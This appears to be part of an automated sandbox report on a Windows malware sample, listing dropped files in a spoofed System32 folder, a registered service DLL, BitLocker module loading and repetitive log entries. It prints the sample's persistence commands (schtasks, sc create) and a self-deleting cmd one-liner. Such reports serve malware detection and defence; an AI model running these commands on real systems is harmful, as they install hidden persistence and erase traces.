Source: 58VSNPxrI4.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 58VSNPxrI4.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF9FC30 GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,GetSystemDirectoryW,GetSystemDirectoryW,LoadLibraryW,32_2_00007FFBBAF9FC30
Source: libcurl.dll.13.drStatic PE information: real checksum: 0x0 should be: 0x91802
Source: libssl-3-x64.dll.13.drStatic PE information: real checksum: 0x0 should be: 0xc8e31
Source: console_zero.exe.13.drStatic PE information: real checksum: 0x0 should be: 0xa3db6
Source: libcrypto-3-x64.dll.13.drStatic PE information: real checksum: 0x0 should be: 0x47ab8d
Source: zlib1.dll.13.drStatic PE information: real checksum: 0x0 should be: 0x1636c
Source: libpq.dll.13.drStatic PE information: real checksum: 0x0 should be: 0x597eb
Source: x939048.dat.13.drStatic PE information: real checksum: 0x0 should be: 0x1e9163
Source: x549596.dat.26.drStatic PE information: real checksum: 0x59de4ca should be: 0x72040e
Source: 58VSNPxrI4.exeStatic PE information: section name: .fptable
Source: printui.dll.0.drStatic PE information: section name: .fptable
Source: libiconv-2.dll.13.drStatic PE information: section name: .xdata
Source: libiconv-2.dll.13.drStatic PE information: section name: /4
Source: libiconv-2.dll.13.drStatic PE information: section name: /19
Source: libiconv-2.dll.13.drStatic PE information: section name: /31
Source: libiconv-2.dll.13.drStatic PE information: section name: /45
Source: libiconv-2.dll.13.drStatic PE information: section name: /57
Source: libiconv-2.dll.13.drStatic PE information: section name: /70
Source: libiconv-2.dll.13.drStatic PE information: section name: /81
Source: libiconv-2.dll.13.drStatic PE information: section name: /92
Source: libintl-9.dll.13.drStatic PE information: section name: .xdata
Source: libintl-9.dll.13.drStatic PE information: section name: /4
Source: libintl-9.dll.13.drStatic PE information: section name: /19
Source: libintl-9.dll.13.drStatic PE information: section name: /31
Source: libintl-9.dll.13.drStatic PE information: section name: /45
Source: libintl-9.dll.13.drStatic PE information: section name: /57
Source: libintl-9.dll.13.drStatic PE information: section name: /70
Source: libintl-9.dll.13.drStatic PE information: section name: /81
Source: libintl-9.dll.13.drStatic PE information: section name: /92
Source: libwinpthread-1.dll.13.drStatic PE information: section name: .xdata
Source: console_zero.exe.13.drStatic PE information: section name: .fptable
Source: vcruntime140d.dll.13.drStatic PE information: section name: _RDATA
Source: x939048.dat.13.drStatic PE information: section name: .fptable
Source: x549596.dat.26.drStatic PE information: section name: .xdata
Source: C:\Windows\System32\svchost.exeCode function: 26_2_649487B2 push r11; ret 26_2_649487ED
Source: C:\Windows\System32\svchost.exeCode function: 26_2_660224A8 push rax; retf 26_2_660224B1
Source: C:\Windows\System32\svchost.exeCode function: 26_2_660F11DC push rbp; retf 26_2_660F11BF
Source: C:\Windows\System32\svchost.exeCode function: 26_2_660F11DC push rbp; retf 26_2_660F11EF
Source: C:\Windows\System32\svchost.exeCode function: 26_2_660F11E4 push rbp; retf 26_2_660F11BF
Source: C:\Windows\System32\svchost.exeCode function: 26_2_660F11E4 push rbp; retf 26_2_660F11EF
Source: C:\Windows\System32\svchost.exeCode function: 26_2_6829984B push 00000000h; retf 26_2_68299850
Source: C:\Windows\System32\svchost.exeCode function: 26_2_682970AC push rax; iretd 26_2_682970AD
Source: C:\Windows\System32\svchost.exeCode function: 26_2_682951B2 push rdx; retn 0000h26_2_682951B3
Source: C:\Windows\System32\svchost.exeCode function: 26_2_6829998B push 00000000h; ret 26_2_68299990
Source: C:\Windows\System32\svchost.exeCode function: 26_2_6829999B push 00000000h; iretd 26_2_682999A0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_6829AA73 push 00000000h; ret 26_2_6829AA78
Source: C:\Windows\System32\svchost.exeCode function: 26_2_6829ABBB push 00000000h; retf 26_2_6829ABC0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_6829ABB3 push 00000000h; ret 26_2_6829ABB8
Source: C:\Windows\System32\svchost.exeCode function: 26_2_682A1428 push rdi; retf 26_2_682A1433
Source: C:\Windows\System32\svchost.exeCode function: 26_2_682A1420 push rbp; retf 26_2_682A1483
Source: C:\Windows\System32\svchost.exeCode function: 26_2_682A1430 push rdi; retf 26_2_682A1433
Source: C:\Windows\System32\svchost.exeCode function: 26_2_682A1468 push rbp; retf 26_2_682A1473
Source: C:\Windows\System32\svchost.exeCode function: 26_2_682A1460 push rsi; retf 26_2_682A1463
Source: C:\Windows\System32\svchost.exeCode function: 26_2_682A1470 push rbp; retf 26_2_682A1473
Source: C:\Windows\System32\svchost.exeCode function: 26_2_682A1440 push rbp; retf 26_2_682A1453
Source: C:\Windows\System32\svchost.exeCode function: 26_2_682A1458 push rbp; retf 26_2_682A145B
Source: C:\Windows\System32\svchost.exeCode function: 26_2_6828D450 push rbp; retf 26_2_682A14BB
Source: C:\Windows\System32\svchost.exeCode function: 26_2_682A14A8 push rbp; retf 26_2_682A1483
Source: C:\Windows\System32\svchost.exeCode function: 26_2_682A14A8 push rbp; retf 26_2_682A14BB
Source: C:\Windows\System32\svchost.exeCode function: 26_2_682A14B0 push rbp; retf 26_2_682A14BB
Source: C:\Windows\System32\svchost.exeCode function: 26_2_682A1490 push rbp; retf 26_2_682A149B
Source: C:\Windows\System32\svchost.exeCode function: 26_2_682A14E8 push rbp; retf 26_2_682A14EB
Source: C:\Windows\System32\svchost.exeCode function: 26_2_682A14E0 push rsp; retf 26_2_682A14E3
Source: C:\Windows\System32\svchost.exeCode function: 26_2_682A1518 push rbp; retf 26_2_682A1523
Source: C:\Windows\System32\svchost.exeCode function: 26_2_6829A7AB push 00000000h; iretd 26_2_6829A7B0

Persistence and Installation Behavior

barindex
Creates a Windows Service pointing to an executable in C:\Windows
Source: C:\Windows\System32\reg.exeKey value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x939048\Parameters ServiceDll C:\Windows\System32\x939048.datJump to behavior
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\System32\console_zero.exeJump to behavior
Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows \System32\printui.exeJump to behavior
Source: C:\Users\user\Desktop\58VSNPxrI4.exeFile created: C:\Windows \System32\printui.exeJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcurl.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\vcruntime140d.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libiconv-2.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\x939048.datJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcrypto-3-x64.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libssl-3-x64.dllJump to dropped file
Source: C:\Users\user\Desktop\58VSNPxrI4.exeFile created: C:\Windows \System32\printui.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\console_zero.exeJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libwinpthread-1.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libintl-9.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\zlib1.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\ucrtbased.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libpq.dllJump to dropped file
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\winsvcf\x549596.datJump to dropped file
Source: C:\Users\user\Desktop\58VSNPxrI4.exeFile created: C:\Windows \System32\printui.exeJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcurl.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\vcruntime140d.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libiconv-2.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\x939048.datJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcrypto-3-x64.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libssl-3-x64.dllJump to dropped file
Source: C:\Users\user\Desktop\58VSNPxrI4.exeFile created: C:\Windows \System32\printui.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\console_zero.exeJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libwinpthread-1.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libintl-9.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\zlib1.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\ucrtbased.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libpq.dllJump to dropped file
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\winsvcf\x549596.datJump to dropped file

Boot Survival

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\reg.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x939048\ParametersJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Self deletion via cmd or bat file
Source: C:\Users\user\Desktop\58VSNPxrI4.exeProcess created: cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\58VSNPxrI4.exe"
Source: C:\Users\user\Desktop\58VSNPxrI4.exeProcess created: cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\58VSNPxrI4.exe"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
